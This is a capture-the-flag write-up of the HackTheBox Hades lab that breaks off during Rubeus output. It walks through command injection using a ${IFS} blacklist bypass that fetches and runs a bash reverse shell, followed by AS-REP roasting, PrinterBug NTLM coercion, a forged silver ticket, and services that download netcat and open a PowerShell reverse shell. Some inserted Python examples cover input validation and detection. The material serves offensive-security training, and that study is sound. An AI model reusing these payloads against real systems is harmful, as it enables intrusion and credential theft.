xchg2pwn


Reversing and exploit development enthusiast



HackTheBox

Hades



Chasm

HADES{Fr4gil3_b1aCkli5tiNg}


We start by scanning the machine's ports with nmap, where we find only one open port: a web service over HTTPS

❯ nmap 10.13.38.16
Nmap scan report for 10.13.38.16  
PORT    STATE SERVICE
443/tcp open  https

We see a web page that at first glance does not look very interesting, although at the top there are several tabs with different features

There is an SSL TOOLS tab with an SSL certificate checker, where you can check the certificate of an IP address or domain that serves HTTPS

Using mitmdump we can listen on port 443 for the requests the checker issues against the certificate, to capture some information about the request

❯ sudo mitmdump -p 443 --mode reverse:https://10.13.38.16 --ssl-insecure --set flow_detail=2  
reverse proxy to https://10.13.38.16 listening at *:443.

Now, from the web page, we trigger the check against our VPN IP address

mitmdump reports several details of the captured request, among them the User-Agent header, curl/7.58.0: the request was issued from a command

❯ sudo mitmdump -p 443 --mode reverse:https://10.13.38.16 --ssl-insecure --set flow_detail=2  
reverse proxy to https://10.13.38.16 listening at *:443.
[10.13.38.15:58110] client connect
[10.13.38.15:58110] server connect 10.13.38.16:443
10.13.38.16:49511: GET https://10.13.38.16/
    Host: 10.13.38.16
    User-Agent: curl/7.58.0
    Accept: */*
 << 200 OK 14.3k
    Date: Thu, 27 Apr 2023 03:11:12 GMT
    Server: Apache/2.4.29 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Last-Modified: Thu, 05 Sep 2019 15:58:47 GMT
    ETag: "3960-591d0659f7d83"
    Accept-Ranges: bytes
    Content-Length: 14688
    Vary: Accept-Encoding
    Content-Type: text/html
[10.13.38.16:49511] client disconnect
[10.13.38.16:49511] server disconnect 10.13.38.16:443

We can append a $(id) to our server's address; if the id command is executed, its output will come back to us with the user that ran it

In the request we can see that it tried to fetch the resource uid=33(www-data) from our IP, which is the output of the executed id command

❯ sudo mitmdump -p 443 --mode reverse:https://10.13.38.16 --ssl-insecure --set flow_detail=1  
reverse proxy to https://10.13.38.16 listening at *:443.
[10.13.38.16:49550] client connect
[10.13.38.16:49550] server connect 10.13.38.16:443
10.13.38.16:49550: GET https://10.13.38.16/uid=33(www-data)
                << 404 Not Found 274b
[10.13.38.16:49550] client disconnect
[10.13.38.16:49550] server disconnect 10.13.38.16:443

To get a shell on the machine we create an index.html file containing a bash reverse shell and serve it with a Python HTTP server

❯ cat index.html
bash -i >& /dev/tcp/10.10.14.10/443 0>&1

❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  

After trying the straightforward command we notice there is a blacklist of some characters, the space included, but we can replace the space with ${IFS}

10.10.14.10/$(curl 10.10.14.10 | bash)

10.10.14.10/$(curl${IFS}10.10.14.10|bash)  

When the request is sent it fetches our index.html with the reverse shell, and once it is piped into bash we receive a shell as www-data, where we find the first flag

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.16
www-data@cee1146c7ac1:~/html/ssltools$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cee1146c7ac1:~/html/ssltools$ hostname -I
172.17.0.2
www-data@cee1146c7ac1:~/html/ssltools$ ls
0fe092ba0_flag.txt  certificate.php  logo.png
www-data@cee1146c7ac1:~/html/ssltools$ cat 0fe092ba0_flag.txt  
HADES{Fr4gil3_b1aCkli5tiNg}
www-data@cee1146c7ac1:~/html/ssltools$
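To show why the checker's blacklist is fragile, here is an added example (not the page's certificate.php, whose source is not shown) that contrasts a denylist modelled on the behaviour observed above with an allowlist that only accepts an IP address or hostname and then invokes curl as an argv list with no shell; the DENYLIST contents and the curl arguments are assumptions.

```python
import ipaddress
import re
import subprocess

# Assumed approximation of the checker's denylist: the page shows that a
# plain space is blocked while ${IFS} and | still get through.
DENYLIST = frozenset(" ;&\n")


def denylist_check(target):
    """Fragile approach: reject only the characters someone thought of."""
    return not any(ch in DENYLIST for ch in target)


# One DNS label: 1-63 chars, alphanumeric, hyphens only in the middle.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$", re.IGNORECASE)


def allowlist_check(target):
    """Robust approach: accept only a literal IP address or a DNS hostname."""
    if len(target) > 253:
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def build_curl_argv(target):
    """Build the curl invocation as an argv list. No shell ever parses it, so
    $(...) and ${IFS} are just bytes in a hostname that fails validation."""
    if not allowlist_check(target):
        raise ValueError("rejected target: %r" % target)
    return ["curl", "-sS", "--max-time", "10", "-o", "/dev/null",
            "-w", "%{ssl_verify_result}", "https://%s/" % target]


def run_check(target):
    """Run the certificate check with shell=False and return curl's stdout."""
    proc = subprocess.run(build_curl_argv(target), shell=False,
                          capture_output=True, text=True, timeout=15)
    return proc.stdout


# The two strings shown on this page, used here only as validator input.
PAGE_INPUTS = [
    "10.10.14.10/$(curl 10.10.14.10 | bash)",      # stopped by the space
    "10.10.14.10/$(curl${IFS}10.10.14.10|bash)",   # slips past the denylist
]

if __name__ == "__main__":
    for s in PAGE_INPUTS + ["10.13.38.16", "dev.htb.local"]:
        print("%-45s denylist=%-5s allowlist=%s"
              % (s, denylist_check(s), allowlist_check(s)))
```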


Guardian

HADES{DoNt_d1s4ble_K3rbeRos_Pre_aUth3nticat1on}


It looks like we are inside a Docker container: our IP address is .2, and by trying default credentials against .1 we can log in as the docker user

www-data@cee1146c7ac1:~$ ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser
   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.  
 (/-_--_-\)           www.tinycorelinux.net

docker@default:~$ id
uid=1000(docker) gid=50(staff) groups=50(staff),100(docker)
docker@default:~$

We have ALL in our sudoers privileges, so with sudo su we become root

docker@default:~$ sudo su
root@default:~# id
uid=0(root) gid=0(root) groups=0(root)  
root@default:~#

Among this machine's network interfaces we find 5 different addresses; the one that stands out is eth1 with 192.168.99.100

root@default:~# ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:57:6D:1C:4B
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42:57ff:fe6d:1c4b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5276 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6767 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:483614 (472.2 KiB)  TX bytes:9003824 (8.5 MiB)

eth0      Link encap:Ethernet  HWaddr 08:00:27:20:AF:32
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe20:af32/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:16931 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6608 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:18015028 (17.1 MiB)  TX bytes:709915 (693.2 KiB)

eth1      Link encap:Ethernet  HWaddr 08:00:27:E6:B0:30
          inet addr:192.168.99.100  Bcast:192.168.99.255  Mask:255.255.255.0  
          inet6 addr: fe80::a00:27ff:fee6:b030/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:445 errors:0 dropped:0 overruns:0 frame:0
          TX packets:472 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:75865 (74.0 KiB)  TX bytes:221543 (216.3 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

veth9d30111 Link encap:Ethernet  HWaddr BA:FE:39:D2:E9:6D
          inet6 addr: fe80::b8fe:39ff:fed2:e96d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5276 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6781 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:557478 (544.4 KiB)  TX bytes:9004900 (8.5 MiB)

root@default:~#

We know we are in an AD lab, so with a static nmap binary we look for hosts with the SMB port open across 192.168.*.*, and we find 3

root@default:~# ./nmap -v -T5 -Pn -n -p 445 --open 192.168.*.*/24  
Nmap scan report for 192.168.3.201
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.168.3.202
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.168.3.203
PORT    STATE SERVICE
445/tcp open  microsoft-ds
root@default:~#

We can run a somewhat longer scan to discover all the open ports on each of the 3 Windows hosts found above

root@default:~# ./nmap -T5 -Pn -n 192.168.3.201-203
Nmap scan report for 192.168.3.201
PORT     STATE SERVICE
135/tcp  open  loc-srv
445/tcp  open  microsoft-ds
5985/tcp open  unknown

Nmap scan report for 192.168.3.202
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  loc-srv
443/tcp  open  https
445/tcp  open  microsoft-ds
5985/tcp open  unknown

Nmap scan report for 192.168.3.203
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  loc-srv
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  unknown
root@default:~#

To reach them from our own machine we can use ligolo-ng, running the agent so it connects back to our machine on port 11601, the port the proxy listens on

root@default:~# ./agent -connect 10.10.14.10:11601 -ignore-cert &
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                 addr="10.10.14.10:11601"  
root@default:~#

On the proxy we get a session; we select it and bring up the tunnel with start

❯ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)  
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

Made in France ♥ by @Nicocha30!

ligolo-ng »
INFO[0005] Agent joined.               name=root@default remote="10.13.38.16:49747"
ligolo-ng » session
? Specify a session : 1 - root@default - 10.13.38.16:49747
[Agent : root@default] » start
INFO[0021] Starting tunnel to root@default
[Agent : root@default] »

We add the 192.168.3.0/24 segment via the ligolo interface and now we have connectivity to every machine in the domain, which we can confirm with a ping

❯ sudo ip route add 192.168.3.0/24 dev ligolo

❯ ping -c1 -w1 192.168.3.203
PING 192.168.3.203 (192.168.3.203) 56(84) bytes of data.
64 bytes from 192.168.3.203: icmp_seq=1 ttl=64 time=169 ms

--- 192.168.3.203 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms  
rtt min/avg/max/mdev = 169.346/169.346/169.346/0.000 ms

After configuring ligolo we have connectivity to the three Windows machines; with crackmapexec we can see the computer names DEV, WEB and DC1

❯ crackmapexec smb 192.168.3.201-203
SMB         192.168.3.201   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         192.168.3.202   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         192.168.3.203   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)

For convenience, and for the attacks that may follow, we add the IP addresses to /etc/hosts with their name, which will be the hostname plus the htb.local domain

❯ tail -n3 /etc/hosts
192.168.3.201 dev.htb.local
192.168.3.202 web.htb.local
192.168.3.203 dc1.htb.local htb.local  

Using kerbrute we can enumerate users against the DC by brute force

❯ kerbrute userenum -d htb.local --dc dc1.htb.local /usr/share/seclists/Usernames/Names/names.txt  
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

>  Using KDC(s):
>  	192.168.3.203:88

>  [+] VALID USERNAME:	 bob@htb.local
>  [+] VALID USERNAME:	 dev@htb.local

We save both discovered users in a users.txt file and with GetNPUsers attempt an ASREPRoast against both; the user bob returns a hash

❯ impacket-GetNPUsers htb.local/dc1.htb.local -no-pass -usersfile users.txt  
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$bob@HTB.LOCAL:be52854293467eeb1900407ac6fef3ef$af612e3bbe242084e7095bb1bac4a6d6fa5b6607bc348655bd5ab20c057e17c21f785963c03c3207b33ee9a6d6f984ce01cad6e5416826a9fb5327fdf3853cb7c94151251445f533fbdab291d569a68c8ef1a44c807acbb424985f3274d9492656868d3922d25a744c3bbdc4deb543064ba4964175a4238ac1dcff471b890e254526b5bd4836281406cb2c927e26b17288e909be954dd0008b4ce998bc77cfd0795c8f50b56948adf24ab8f9ee9461e80f2e91178c1310fe1f1a8ceaaafe2b8d48393d9d20aeed3bd1966aadcdf2e4309dc1f774b7b6a195fc0a135c782cf2e9ec6b0108f73e  
[-] User dev doesn't have UF_DONT_REQUIRE_PREAUTH set

With john we can easily crack bob's hash and obtain his password

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
Passw0rd1!       ($krb5asrep$23$bob@HTB.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
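From the defender's side, the two Kerberos steps above (kerbrute's username guessing and the AS-REP roast of bob) leave distinct traces. The following added example, which is not from the page, checks userAccountControl for the UF_DONT_REQUIRE_PREAUTH bit that GetNPUsers reports and triages constructed 4768 events; the sample usernames, the source IP address and the event records are invented.

```python
from collections import Counter

# userAccountControl bit that GetNPUsers reports as UF_DONT_REQUIRE_PREAUTH
DONT_REQ_PREAUTH = 0x400000
# Kerberos etype 23 (RC4-HMAC): what "$krb5asrep$23$" in john's input means
ETYPE_RC4 = "0x17"


def accounts_without_preauth(ldap_rows):
    """Return the accounts whose UAC has Kerberos pre-authentication disabled."""
    return sorted(r["sAMAccountName"] for r in ldap_rows
                  if int(r["userAccountControl"]) & DONT_REQ_PREAUTH)


def asrep_roast_candidates(events):
    """Successful 4768 with PreAuthType 0 and an RC4 ticket: the exact shape of
    a roastable AS-REP being handed out to an unauthenticated requester."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e.get("EventID") == 4768 and e.get("Status") == "0x0"
            and e.get("PreAuthType") == "0"
            and e.get("TicketEncryptionType", "").lower() == ETYPE_RC4]


def enumeration_sources(events, threshold=5):
    """IPs producing many 4768 failures with 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN):
    username guessing in the style of kerbrute userenum."""
    failures = Counter(e["IpAddress"] for e in events
                       if e.get("EventID") == 4768 and e.get("Status") == "0x6")
    return sorted(ip for ip, n in failures.items() if n >= threshold)


# ---- constructed sample data (invented values) ------------------------------
SCANNER_IP = "::ffff:192.168.3.50"

SAMPLE_LDAP = [
    {"sAMAccountName": "bob", "userAccountControl": 0x400000 | 0x200},  # no preauth
    {"sAMAccountName": "dev", "userAccountControl": 0x200},             # NORMAL_ACCOUNT
    {"sAMAccountName": "DEV$", "userAccountControl": 0x1000},           # WORKSTATION_TRUST
]


def _tgt_event(user, status, preauth, etype, ip=SCANNER_IP):
    return {"EventID": 4768, "TargetUserName": user, "ServiceName": "krbtgt",
            "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype, "IpAddress": ip}


SAMPLE_EVENTS = (
    # eight guesses for names that do not exist: principal unknown
    [_tgt_event("name%d" % i, "0x6", "-", "0xffffffff") for i in range(8)]
    # dev probed without pre-auth: the KDC demands it (KDC_ERR_PREAUTH_REQUIRED)
    + [_tgt_event("dev", "0x19", "-", "0xffffffff")]
    # bob roasted: TGT issued with no pre-auth, RC4 encrypted
    + [_tgt_event("bob", "0x0", "0", "0x17")]
    # ordinary workstation logon: PA-ENC-TIMESTAMP (2) and AES256 (0x12)
    + [_tgt_event("DEV$", "0x0", "2", "0x12", ip="::ffff:192.168.3.201")]
)

if __name__ == "__main__":
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_LDAP))
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("enumeration sources:", enumeration_sources(SAMPLE_EVENTS))
```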

We validate them with crackmapexec and, listing the SMB shares on DC1, we see we now have read access to the Users share

❯ crackmapexec smb dc1.htb.local -u bob -p Passw0rd1! --shares
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\bob:Passw0rd1! 
SMB         dc1.htb.local   445    DC1              [+] Enumerated shares
SMB         dc1.htb.local   445    DC1              Share           Permissions     Remark
SMB         dc1.htb.local   445    DC1              -----           -----------     ------
SMB         dc1.htb.local   445    DC1              ADMIN$                          Remote Admin
SMB         dc1.htb.local   445    DC1              C$                              Default share
SMB         dc1.htb.local   445    DC1              IPC$            READ            Remote IPC
SMB         dc1.htb.local   445    DC1              NETLOGON        READ            Logon server share 
SMB         dc1.htb.local   445    DC1              SYSVOL          READ            Logon server share 
SMB         dc1.htb.local   445    DC1              Users           READ

We simply connect with smbclient; inside Users we find a bob directory with flag.txt in it, so we download it with get and read it

❯ impacket-smbclient htb.local/bob:'Passw0rd1!'@dc1.htb.local  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Users
# ls
drw-rw-rw-          0  Fri Sep  6 05:50:58 2019 .
drw-rw-rw-          0  Fri Sep  6 05:50:58 2019 ..
drw-rw-rw-          0  Fri Sep  6 06:10:00 2019 bob
# cd bob
# ls
drw-rw-rw-          0  Fri Sep  6 06:10:00 2019 .
drw-rw-rw-          0  Fri Sep  6 06:10:00 2019 ..
-rw-rw-rw-         47  Fri Sep  6 06:10:54 2019 flag.txt
# get flag.txt
# exit

❯ cat flag.txt
HADES{DoNt_d1s4ble_K3rbeRos_Pre_aUth3nticat1on}


Messenger

HADES{Sp0ol_SeRv1ce_sO_Brok3n}


Listing some services with rpcdump we find a fairly well-known one running, the MS-RPRN service, which belongs to spoolsv.exe

❯ impacket-rpcdump htb.local/bob:'Passw0rd1!'@dev.htb.local | grep MS-RPRN -A2  
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0

To fit the better-known crackers that rely on precomputed tables, such as crack.sh, we change Responder's Challenge to 1122334455667788

❯ grep Challenge /etc/responder/Responder.conf  
Challenge = 1122334455667788

Now we put responder in listening mode, specifying the tun0 interface and the --lm parameter to force a downgrade to the older protocol versions

❯ sudo responder -I tun0 --lm
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|  
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

[+] Listening for events...

We use printerbug with the credentials we already have, which we know are valid in the domain, so that DEV makes a request to our host via RPC

❯ python3 printerbug.py htb.local/bob:'Passw0rd1!'@dev.htb.local 10.10.14.10
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attempting to trigger authentication via rprn RPC at dev.htb.local
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.  
[*] Triggered RPC backconnect, this may or may not have worked

Back on the listening responder we can see that the DEV$ machine has authenticated to our host, and we receive its hash in NTLMv1 format

❯ sudo responder -I tun0 --lm
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

[+] Listening for events...

[SMB] NTLMv1 Client   : 10.13.38.17
[SMB] NTLMv1 Username : HTB\DEV$
[SMB] NTLMv1 Hash     : DEV$::HTB:A7509E055B9C053829A4802EA4DB0F1A9622805EF63409D5:A7509E055B9C053829A4802EA4DB0F1A9622805EF63409D5:1122334455667788  

Since brute force would probably take us days, we turn to crack.sh, giving it our email address and passing the hash in the following format

NTHASH:A7509E055B9C053829A4802EA4DB0F1A9622805EF63409D5  

After a few minutes we receive an email from crack.sh with the results of the request, in which it recovered the NT hash from the input we sent

We can verify with crackmapexec that the NT hash we received is valid to authenticate as the DEV$ computer account of the htb.local domain

❯ crackmapexec smb dev.htb.local -u DEV$ -H 01300a3009c7ae1af0ea216ebada48ad
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] htb.local\DEV$:01300a3009c7ae1af0ea216ebada48ad

However, it does not return Pwn3d!; so we will impersonate Administrator by means of a silver ticket, for which we first need the domain SID

❯ impacket-getPac htb.local/bob:Passw0rd1! -targetUser bob | grep SID  
Domain SID: S-1-5-21-4266912945-3985045794-2943778634

Now, with the SID and the hash, we forge a new ticket with ticketer for dev's cifs SPN impersonating Administrator, and export it to authenticate with it

❯ impacket-ticketer -nthash 01300a3009c7ae1af0ea216ebada48ad -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -domain htb.local -spn cifs/dev.htb.local Administrator  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for htb.local/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache

❯ export KRB5CCNAME=Administrator.ccache

With crackmapexec we verify authentication with the ticket and it returns Pwn3d!; however, we have no write access to any SMB share, so we will not be able to get a shell with tools such as psexec

❯ crackmapexec smb dev.htb.local -k --use-kcache
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] htb.local\ from ccache (Pwn3d!)

❯ crackmapexec smb dev.htb.local -k --use-kcache --shares
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] htb.local\ from ccache (Pwn3d!)
SMB         dev.htb.local   445    DEV              [+] Enumerated shares
SMB         dev.htb.local   445    DEV              Share           Permissions     Remark
SMB         dev.htb.local   445    DEV              -----           -----------     ------
SMB         dev.htb.local   445    DEV              IPC$                            Remote IPC

If we try to dump the SAM with secretsdump it returns a small error

❯ impacket-secretsdump dev.htb.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0xe4b2298c95677ce18cd2198b9a36c7df
[-] SAM hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)  
[-] LSA hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)  
[*] Cleaning up...

As we saw on the Resolute machine, crackmapexec's Pwn3d! reflects privileges at the service-control level, not on SMB shares, so that is the route we will take

# Excerpt of the check behind crackmapexec's Pwn3d!: it only tries to open the
# Service Control Manager with full access, which succeeds for local admins
# regardless of whether ADMIN$ or C$ are reachable
try:
    # 0xF003F - SC_MANAGER_ALL_ACCESS
    # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
    ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host), 'ServicesActive\x00', 0xF003F)
    self.admin_privs = True
except scmr.DCERPCException as e:
    # Access denied (or any other RPC fault) means no admin rights
    self.admin_privs = False
    pass

We can use services to create a new service named netcat whose command line runs a curl against our host to download netcat.exe onto the machine

❯ impacket-services dev.htb.local -k -no-pass create -name netcat -display netcat -path 'curl 10.10.14.10/netcat.exe -o C:\ProgramData\netcat.exe'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating service netcat

Now we use the start action to run the netcat service we just created

❯ impacket-services dev.htb.local -k -no-pass start -name netcat  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Starting service netcat

When we do, our machine receives a request for netcat.exe, which means netcat was downloaded and that we are executing commands on the dev machine

❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  
10.13.38.17 - - "GET /netcat.exe HTTP/1.1" 200 -

Next we create a service named shell that runs netcat.exe to send a PowerShell back to our host on port 443, and then we start it

❯ impacket-services dev.htb.local -k -no-pass create -name shell -display shell -path 'C:\ProgramData\netcat.exe 10.10.14.10 443 -e powershell'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating service shell

❯ impacket-services dev.htb.local -k -no-pass start -name shell   
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Starting service shell

When the service runs we receive a PowerShell on the DEV machine as nt authority\system, the user with the highest privileges on the system

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.17
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
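What the impacket-services steps above leave behind on DEV are System-log 7045 (service installed) events whose ImagePath is a curl command line and then a netcat binary under C:\ProgramData. The added example below, which is not part of the page, triages constructed 7045 records with the simple rules a defender would apply; the sample records (beyond the two command lines taken from this page) and the writable-directory list are assumptions.

```python
import re

# Directories a downloaded tool or a low-privilege user can write to (assumed list).
WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\",
                     "c:\\windows\\temp\\", "c:\\temp\\")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# netcat-style "-e powershell" / "-e cmd": a service spawning an interactive shell
SHELL_FLAG_RE = re.compile(r"(?:^|\s)-e\s+(?:powershell|cmd)(?:\.exe)?\b", re.IGNORECASE)


def launcher(image_path):
    """First token of ImagePath, honouring a leading double-quoted path."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def suspicious_reasons(event):
    """Return the rules a 7045 record trips; an empty list means it looks benign."""
    path = event.get("ImagePath", "")
    exe = launcher(path).lower()
    reasons = []
    if not exe.endswith((".exe", ".sys")):
        reasons.append("launcher is not a service binary")
    if exe.startswith(WRITABLE_PREFIXES):
        reasons.append("binary lives in a user-writable directory")
    if IPV4_RE.search(path):
        reasons.append("IPv4 literal in command line")
    if SHELL_FLAG_RE.search(path):
        reasons.append("spawns an interactive shell")
    return reasons


def triage(events):
    """Map ServiceName -> reasons for every record that trips at least one rule."""
    flagged = {}
    for e in events:
        reasons = suspicious_reasons(e)
        if reasons:
            flagged[e["ServiceName"]] = reasons
    return flagged


# Constructed 7045 records; the first two ImagePaths are the page's own service
# command lines, the rest are invented benign installs.
SAMPLE_7045 = [
    {"ServiceName": "netcat", "AccountName": "LocalSystem",
     "ImagePath": r"curl 10.10.14.10/netcat.exe -o C:\ProgramData\netcat.exe"},
    {"ServiceName": "shell", "AccountName": "LocalSystem",
     "ImagePath": r"C:\ProgramData\netcat.exe 10.10.14.10 443 -e powershell"},
    {"ServiceName": "Sysmon64", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\Sysmon64.exe"},
    {"ServiceName": "VendorAgent", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" -svc'},
    {"ServiceName": "SomeSvcHost", "AccountName": "LocalSystem",
     "ImagePath": r"%SystemRoot%\system32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_7045).items():
        print("%-12s %s" % (name, "; ".join(reasons)))
```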

Another way to get a session on DEV$ is to use Rubeus: we move to a Windows box and, in a PowerShell, route all traffic for the 192.168.3.0 network through 192.168.100.85, the Linux machine that has connectivity

PS C:\Users\pc1\Desktop> route add 192.168.3.0 MASK 255.255.255.0 192.168.100.85  
Correcto
PS C:\Users\pc1\Desktop>

Now, to avoid problems, we add the addresses of all the computers in the htb.local domain to our Windows hosts file

Back in PowerShell, with Rubeus we supply the DEV$ computer hash and impersonate the Administrator user; doing so imports a new ticket into our session

PS C:\Users\pc1\Desktop> .\Rubeus.exe s4u /user:DEV$ /rc4:01300a3009c7ae1af0ea216ebada48ad /impersonateuser:Administrator /altservice:http/dev.htb.local /domain:htb.local /dc:dc1.htb.local /self /ptt  

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

